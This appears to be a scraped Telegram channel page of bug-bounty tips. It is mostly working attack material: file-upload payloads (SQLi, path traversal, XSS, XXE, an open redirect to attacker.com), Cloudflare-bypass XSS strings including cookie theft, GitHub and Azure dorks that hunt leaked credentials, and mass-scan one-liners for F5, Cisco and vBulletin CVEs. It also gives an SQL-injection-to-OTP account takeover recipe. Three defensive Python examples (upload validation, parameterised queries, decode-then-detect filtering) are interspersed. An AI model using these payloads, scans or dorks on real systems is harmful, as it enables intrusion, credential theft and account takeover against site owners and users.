CTF | Bug Bounty
Join us for CTF resources, bug bounty resources, CTF challenges and more. Join now: https://t.me/ctftm. Owner: Team Matrix. DMCA/copyright claims: @Dmcatm. Admin contact: @Teammatrixs_bot
XSS Hunting from WaybackURLs
Payload:
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
#bugbountytips #bugbounty
Chaining Vulnerabilities through File Upload
SQLi:
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal:
../../etc/passwd/logo.png
../../../logo.png
XSS:
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
XXE:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
====================
Join Our Telegram Channel
https://t.me/ctftm
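The SVG and file-name payloads in the upload post above are exactly what an upload handler has to refuse. The validator below is an added example, not code from the channel; its file-name allow-list pattern and element deny-list are constructed for illustration, and DOCTYPE/entity declarations are rejected before any XML parser touches the file.

```python
import re
import xml.etree.ElementTree as ET

# Constructed allow-list for the client-supplied file name: no path separators,
# quotes, angle brackets or double extensions can pass it.
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9_\-]{1,64}\.(svg|png|jpe?g|gif)$")

# Constructed deny-list: elements that run script or fetch other resources.
FORBIDDEN_TAGS = {"script", "foreignObject", "iframe", "object", "embed", "use", "image"}


def check_filename(name: str) -> bool:
    """True only for a plain name such as 'logo.png'; traversal and markup fail."""
    return SAFE_FILENAME.match(name) is not None


def svg_findings(data: bytes) -> list:
    """Reasons to reject an SVG upload; an empty list means it passed."""
    text = data.decode("utf-8", errors="replace")
    # Refuse DOCTYPE/entity declarations before the XML parser sees the file (XXE).
    if re.search(r"<!(DOCTYPE|ENTITY)", text, re.IGNORECASE):
        return ["doctype/entity declaration (XXE)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        local = el.tag.split("}", 1)[-1]          # drop the namespace part
        if local in FORBIDDEN_TAGS:
            findings.append(f"forbidden element <{local}>")
        for attr, value in el.attrib.items():
            aname = attr.split("}", 1)[-1].lower()
            if aname.startswith("on"):            # onload, onerror, onmouseover, ...
                findings.append(f"event handler {aname} on <{local}>")
            elif aname == "href" and re.match(r"\s*(javascript|data):", value, re.I):
                findings.append(f"scriptable href on <{local}>")
    return findings


if __name__ == "__main__":
    # Constructed samples modelled on the post: an onload handler and a clean file.
    for sample in (b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>',
                   b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="300" height="100"/></svg>'):
        print(svg_findings(sample) or "clean")
    print(check_filename("../../etc/passwd/logo.png"), check_filename("logo.png"))
```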
GitHub Dorks
Happy Hunting
- api_key
- app_AWS_SECRET_ACCESS_KEY
- app_secret
- authoriztion
- Ldap
- aws_access_key_id
- secret
- bash_history
- bashrc%20password
- beanstalkd
- client secre
- composer
- config
- credentials
- DB_PASSWORD
- dotfiles
- .env file
- .exs file
- extension:json mongolab.com
- extension:pem%20private
- extension:ppk private
- extension:sql mysql dump
- extension:yaml mongolab.com
- .mlab.com password
- mysql
- npmrc%20_auth
- passwd
- passkey
- rds.amazonaws.com password
- s3cfg
- send_key
- token
- filename:.bash_history
- filename:.bash_profile aws
- filename:.bashrc mailchimp
- filename:CCCam.cfg
- filename:config irc_pass
- filename:config.php dbpasswd
- filename:config.json auths
- filename:config.php pass
- filename:config.php dbpasswd
- filename:connections.xml
- filename:.cshrc
- filename:.git-credentials
- filename:.ftpconfig
- filename:.history
- filename:gitlab-recovery-codes.txt
- filename:.htpasswd
- filename:id_rsa
- filename:.netrc password
- FTP
- filename:wp-config.php
- git-credentials
- github_token
- HEROKU_API_KEY language:json
- HEROKU_API_KEY language:shell
- GITHUB_API_TOKEN language:shell
- oauth
- OTP
- databases password
- [WFClient] Password= extension:ica
- xoxa_Jenkins
- security_credentials
#bugbountytips #GitHub
New XSS Fly Under Radar Cloudflare Bypass
Payload:
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit: Halim
Awesome One-liner Bug Bounty:
> A collection of awesome one-liner scripts especially for bug bounty.
This repository stores and houses various one-liners for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily welcome.
## Definitions
This section defines specific terms or placeholders that are used throughout one-line command/scripts.
- 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.
- 1.2. "HOSTS.txt" is a file containing more than one entry matching criteria 1.1.
- 2.1. "URL" defines a full URL, e.g. replaced by http://domain.tld/path/page.html or anything else starting with the HTTP/HTTPS protocol.
- 2.2. "URLS.txt" is a file containing more than one entry matching criteria 2.1.
- 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs.
- 4.1. "OUT.txt" or "OUT{N}.txt" means the file in which the result of the executed command is stored.
---
### Local File Inclusion
> @dwisiswant0
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
### Open-redirect
> @dwisiswant0
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
> @N3T_hunt3r
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
### XSS
> @cihanmehmet
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
> @fanimalikhack
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
> @oliverrickfors
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
### Prototype Pollution
> @R0X4R
subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
### CVE-2020-5902
> @Madrobot_
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
### CVE-2020-3452
> @vict0ni
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
### CVE-2022-0378
> @7h3h4ckv157
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
> @Madrobot_
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
### Find JavaScript Files
Tip: extract IPs from a list of domains, then you can fuzz or manually check them for SDE/BAC, ports, etc.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips
SQL Injection to Account Takeover Manually :)
1. Enter a mobile number to log in and intercept the request:
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> exact time and date
1 >> attempts
You can see the 200 response.
Last, you can log in with the 1110 OTP and get access to the victim's account :)
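The OTP login post above works because the mobile number is concatenated into an INSERT that also stores the OTP, timestamps and attempt counter. The following is an added example (not the post's code, and not the affected application's) of the hardened side: a strict input rule, bound parameters, a server-generated OTP and an attempt limit. The table and column names are assumed from the posted payload.

```python
import hmac
import re
import secrets
import sqlite3
from datetime import datetime, timezone

MOBILE_RE = re.compile(r"^\d{10}$")   # constructed rule: exactly ten digits, nothing else
MAX_ATTEMPTS = 3


def open_db() -> sqlite3.Connection:
    """In-memory table with the columns the posted payload implies (assumed names)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE otp_login (mobile_number TEXT PRIMARY KEY, otp TEXT,"
                 " created_at TEXT, attempts INTEGER, updated_at TEXT)")
    return conn


def request_otp(conn: sqlite3.Connection, mobile: str) -> str:
    """Validate the number, generate the OTP server-side, insert with bound parameters."""
    if not MOBILE_RE.match(mobile):
        raise ValueError("mobile_number must be exactly ten digits")
    otp = f"{secrets.randbelow(10**6):06d}"
    now = datetime.now(timezone.utc).isoformat()
    # Placeholders bind the value as data: quotes and '--' cannot close the literal
    # or rewrite the otp/attempts columns the way the posted payload does.
    conn.execute("INSERT OR REPLACE INTO otp_login VALUES (?, ?, ?, 0, ?)",
                 (mobile, otp, now, now))
    conn.commit()
    return otp


def verify_otp(conn: sqlite3.Connection, mobile: str, otp: str) -> bool:
    """Count every attempt, compare in constant time, consume the OTP on success."""
    row = conn.execute("SELECT otp, attempts FROM otp_login WHERE mobile_number = ?",
                       (mobile,)).fetchone()
    if row is None or row[1] >= MAX_ATTEMPTS:
        return False
    conn.execute("UPDATE otp_login SET attempts = attempts + 1, updated_at = ?"
                 " WHERE mobile_number = ?", (datetime.now(timezone.utc).isoformat(), mobile))
    ok = hmac.compare_digest(row[0].encode(), otp.encode())
    if ok:
        conn.execute("DELETE FROM otp_login WHERE mobile_number = ?", (mobile,))
    conn.commit()
    return ok


if __name__ == "__main__":
    db = open_db()
    try:   # the post's injection string never reaches SQL
        request_otp(db, "8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --")
    except ValueError as exc:
        print("rejected:", exc)
    code = request_otp(db, "8888888888")
    print(verify_otp(db, "8888888888", "1111"), verify_otp(db, "8888888888", code))
```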
(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover
Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
Tips: always play with the input's reflected values and tags, even when there is a WAF/Cloudflare.
#bugbountytip #bugbounty
Azure OSINT Google Dork List
- site:blob.core.windows.net "keyword"
- site:"blob.core.windows.net" and intext:"CONFIDENTIAL"
- site:*.core.windows.net intext:"TLP:RED"
- site:*.core.windows.net
- site:*.core.windows.net +blob
- site:*.core.windows.net +files -web -blob
- site:*.core.windows.net -web
- site:*.core.windows.net -web -blob -files
- site:*.core.windows.net inurl:dsts.dsts
- site:*.core.windows.net inurl:"term" -web
- site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)
- intext:connectionstring blob filetype:config
- intext:accountkey windows.net filetype:xml
- intext:storageaccountkey windows.net filetype:txt
Please Share Across Your Network, Someone Might Really Be Looking For This.
#Infosec #GHDB #Azure #bugbounty
New XSS Bypass Cloudflare WAF
Payload: %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
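Both Cloudflare-bypass payloads on this page (the multiply-encoded <input> one posted earlier and the %3CSVG/oNlY=1 one just above) get past a filter that inspects the request before it has been decoded as far as the application will decode it. This added example (not from the channel) normalises a value by percent-decoding until it stops changing, then applies two constructed detection rules to the result; the rule names and the benign sample are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed: undo percent/plus encoding repeatedly, since a filter that decodes
# once never sees what the application finally receives. Rounds are capped so a
# pathological input cannot keep the normaliser busy.
def normalize(value: str, max_rounds: int = 5):
    """Return (decoded_value, number_of_rounds_that_changed_it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

# Constructed rules run against the fully decoded text, case-insensitively: a tag
# carrying an on* attribute (space or '/' as separator), and the
# eval/String.fromCharCode obfuscation used in the first payload.
RULES = {
    "event_handler_tag": re.compile(r"<\s*\w+[^>]*(?:\s|/)on\w+\s*=", re.I),
    "eval_fromcharcode": re.compile(r"\beval\s*\(|String\.fromCharCode", re.I),
}

def inspect(raw: str) -> dict:
    decoded, rounds = normalize(raw)
    hits = [name for name, rule in RULES.items() if rule.search(decoded)]
    return {"decoded": decoded, "rounds": rounds, "hits": hits}

# The two payloads posted on this page, plus a constructed benign parameter.
SAMPLES = {
    "input_tag": '"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"'
                 '%252bonfocus%25253d"this.style.display%25253d\'block\'%25253b%252bthis.onfocus%25253dnull%25253b"'
                 '%252boNMoUseOVer%25253d"this[\'onmo\'%25252b\'useover\']%25253dnull%25253beval('
                 'String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,'
                 '100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>',
    "svg_tag": "%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E",
    "benign": "q=price%3D100%26sort%3Dasc",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect(raw))
```

The decoded first payload shows why the filter missed it: every `%25253d` is an `=` three layers down, and the `'onmo'+'useover'` concatenation hides the second handler name until the string is decoded completely.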